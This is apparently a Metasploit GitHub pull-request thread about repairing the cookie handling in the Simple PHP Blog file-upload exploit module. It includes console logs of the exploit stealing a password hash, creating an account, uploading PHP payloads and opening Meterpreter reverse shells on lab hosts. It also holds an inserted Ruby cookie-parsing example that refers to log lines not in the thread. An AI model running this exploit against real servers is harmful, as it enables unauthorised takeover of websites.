bcoles commented Nov 30, 2020

Here you go:

msf6 exploit(unix/webapp/sphpblog_file_upload) > exploit

[*] Started reverse TCP handler on 10.10.10.250:4444 
[+] Successfully retrieved hash: $1$qmJBhAiQ$svVcAJqX0gNhlX.iCpY4o0
[+] Successfully removed /config/password.txt
[+] Successfully created temporary account.
[+] Successfully logged in as CCBBiy:GXGLyD
"PHPSESSID=kgks1uicqn4n74kba3an676fd3;"
[-] Error retrieving cookie!
[+] Successfully Uploaded zGZZdjHW6BgsWClwBHnu.php
[+] Successfully Uploaded gaj9hSsTlUrN0fDrxpiq.php
[+] Successfully reset original password hash.
[+] Successfully removed /images/zGZZdjHW6BgsWClwBHnu.php
[*] Calling payload: /images/gaj9hSsTlUrN0fDrxpiq.php
[+] Successfully removed /images/gaj9hSsTlUrN0fDrxpiq.php
[*] Exploit completed, but no session was created.

Thanks. So it looks like PHPSESSID and my_id are identical, and get_cookies can successfully retrieve PHPSESSID.

It would probably make more sense to rework the cookie parsing logic in this module to use PHPSESSID.

Does something like this work for you?

if res.get_cookies =~ /PHPSESSID=(.+);/

If so, that seems like the best fix. I'm going to assume that the server always issues both a PHPSESSID and my_id cookie.

Thanks for taking the time to report and fix this. It looks like it was broken in 8d4d40b and never tested.

Ideally this module should be rewritten and tested. But I have neither the time nor the interest.

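The cookie handling discussed in this thread, as an added example in plain Ruby that is not the module's or Metasploit's own code: it parses a Set-Cookie header shaped like the one quoted above (sample values constructed from the thread), tries the my_id lookup the module relied on, applies the PHPSESSID regex proposed above next to a stricter variant that is not fooled by a second cookie, and validates the session id before building the Cookie header so a non-session string cannot split the header line the way the 400 Bad Request responses above show. The names parse_set_cookie, session_strict, valid_session_id? and cookie_header are chosen here and are not the module's.

```ruby
# Added example, not the module's or Metasploit's own code. It reproduces the
# cookie handling discussed in this thread with plain Ruby and no dependencies.

# Constructed from the Set-Cookie header quoted in the thread.
SAMPLE_SET_COOKIE = 'PHPSESSID=7869n2gpoto3nbd2pa3pgb18q3; path=/, my_id=7869n2gpoto3nbd2pa3pgb18q3'.freeze

# Constructed to match the res.get_cookies.inspect output pasted above.
SAMPLE_GET_COOKIES = 'PHPSESSID=kgks1uicqn4n74kba3an676fd3;'.freeze

# Cookie attributes that must not be mistaken for cookies.
COOKIE_ATTRS = %w[path domain expires max-age secure httponly samesite].freeze

# name=value pairs: names stop at '=', values at ';' or ','. The comma inside an
# expires= date is harmless because the date fragment carries no '='.
COOKIE_PAIR = /([^=;,\s]+)=([^;,]*)/

# Split a comma-folded Set-Cookie header into a name => value hash.
def parse_set_cookie(header)
  header.scan(COOKIE_PAIR).each_with_object({}) do |(name, value), cookies|
    next if COOKIE_ATTRS.include?(name.downcase)
    cookies[name] = value.strip
  end
end

# The original check keyed on my_id, which get_cookies does not return here,
# so the lookup yields nil and the module printed its error instead.
def session_via_my_id(cookie_string)
  cookie_string =~ /my_id=([^;\s]+)/ ? Regexp.last_match(1) : nil
end

# The regex proposed in the thread. It works on the single-cookie string above,
# but (.+) is greedy: with two cookies it swallows everything up to the last ';'.
def session_proposed(cookie_string)
  cookie_string =~ /PHPSESSID=(.+);/ ? Regexp.last_match(1) : nil
end

# Tighter variant: the value ends at the first ';' or whitespace.
def session_strict(cookie_string)
  cookie_string =~ /PHPSESSID=([^;\s]+)/ ? Regexp.last_match(1) : nil
end

# PHP's default session id alphabet is [0-9a-zA-Z,-]. Anything outside it, such
# as an error message ending in a newline, would break the Cookie header into
# two lines, which is the "missing ':' separator" 400 shown in the log above.
def valid_session_id?(session)
  session.is_a?(String) && session.match?(/\A[0-9a-zA-Z,-]{1,128}\z/)
end

# Builds the Cookie header the module sends, refusing unsafe session values.
def cookie_header(session)
  raise ArgumentError, 'unsafe session id' unless valid_session_id?(session)

  "my_id=#{session}; PHPSESSID=#{session}"
end

if __FILE__ == $PROGRAM_NAME
  p parse_set_cookie(SAMPLE_SET_COOKIE)
  p session_via_my_id(SAMPLE_GET_COOKIES)
  p session_proposed(SAMPLE_GET_COOKIES)
  p session_proposed('PHPSESSID=abc; my_id=abc;')
  p session_strict('PHPSESSID=abc; my_id=abc;')
  p cookie_header(session_strict(SAMPLE_GET_COOKIES))
end
```

Run it with `ruby cookie_check.rb`; the two-cookie input makes the greedy capture visible, and feeding the error string into cookie_header raises instead of emitting a header with an embedded newline.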
@justinopatrny

Works for me - successful when new code applied.

msf6 exploit(unix/webapp/sphpblog_file_upload) > exploit

[*] Started reverse TCP handler on 10.10.10.250:4444 
[+] Successfully retrieved hash: $1$gzszdvUY$a9drusIlFhoFOwPnJdOxm0
[+] Successfully removed /config/password.txt
[+] Successfully created temporary account.
[+] Successfully logged in as rkTjHM:nufDWI
[+] Successfully retrieved cookie: gq8hmdnpb09tht26dacrfp96f7
[+] Successfully Uploaded O02kypIovyInIArpbnDe.php
[+] Successfully Uploaded jldytwOV9Pv4Qs7O5LDv.php
[+] Successfully reset original password hash.
[+] Successfully removed /images/O02kypIovyInIArpbnDe.php
[*] Calling payload: /images/jldytwOV9Pv4Qs7O5LDv.php
[*] Sending stage (39282 bytes) to 10.10.10.100
[*] Meterpreter session 1 opened (10.10.10.250:4444 -> 10.10.10.100:38551) at 2020-11-29 22:02:29 -0600
[+] Successfully removed /images/jldytwOV9Pv4Qs7O5LDv.php

@bcoles bcoles added the bug label Dec 2, 2020
@smcintyre-r7 smcintyre-r7 self-assigned this Dec 2, 2020
@smcintyre-r7

Confirmed switching it to PHPSESSID worked for me as well so I pushed that change up in a322647. Once the unit tests pass I'll go ahead and land this.

msf6 exploit(unix/webapp/sphpblog_file_upload) > rexploit
[*] Reloading module...

[*] Started reverse TCP handler on 10.10.10.128:4444 
[+] Successfully retrieved hash: $1$pEc2Ps7f$x5G9uLsdOCcV5UPhhdj7K1
[+] Successfully removed /config/password.txt
[+] Successfully created temporary account.
[+] Successfully logged in as 8f0VZw:vJI3ni
[+] Successfully retrieved cookie: o0c53uv0pq8prbjr2s2f4e2aq6
[+] Successfully uploaded DGQ9zJPZ4JBxY4AiDMMX.php
[+] Successfully uploaded it2rNwY1lEVDq0p5vmzW.php
[+] Successfully reset original password hash.
[+] Successfully removed /images/DGQ9zJPZ4JBxY4AiDMMX.php
[*] Calling payload: /images/it2rNwY1lEVDq0p5vmzW.php
[*] Sending stage (39282 bytes) to 10.10.10.100
[*] Meterpreter session 2 opened (10.10.10.128:4444 -> 10.10.10.100:41445) at 2020-12-02 10:06:56 -0500

id
[+] Successfully removed /images/it2rNwY1lEVDq0p5vmzW.php

meterpreter > 
meterpreter > id
[-] Unknown command: id.
meterpreter > getuid
Server username: www-data (33)
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 10.10.10.100 - Meterpreter session 2 closed.  Reason: User exit

@smcintyre-r7

For the record, I went back through the SVN history on SourceForge and noticed that the oldest revision is v0.5.0 according to docs/CHANGELOG.TXT. I found no references to my_id in the code, but did notice that it appears to be using the standard PHP session mechanism. It may have changed between 0.4.0 and 0.5.0, but I'm not sure where the original use of my_id came from. My guess is they were migrating to the PHP standard mechanism at that time.

@smcintyre-r7 smcintyre-r7 merged commit 2b48c42 into rapid7:master Dec 3, 2020
@smcintyre-r7

smcintyre-r7 commented Dec 3, 2020

Release Notes

Fixed the exploits/unix/webapp/sphpblog_file_upload (Simple PHP Blog) exploit to use the correct session cookie value.

@smcintyre-r7 smcintyre-r7 linked an issue Dec 3, 2020 that may be closed by this pull request: Cookie retrieval issue in sphp exploit
@pbarry-r7 pbarry-r7 added the rn-fix release notes fix label Dec 9, 2020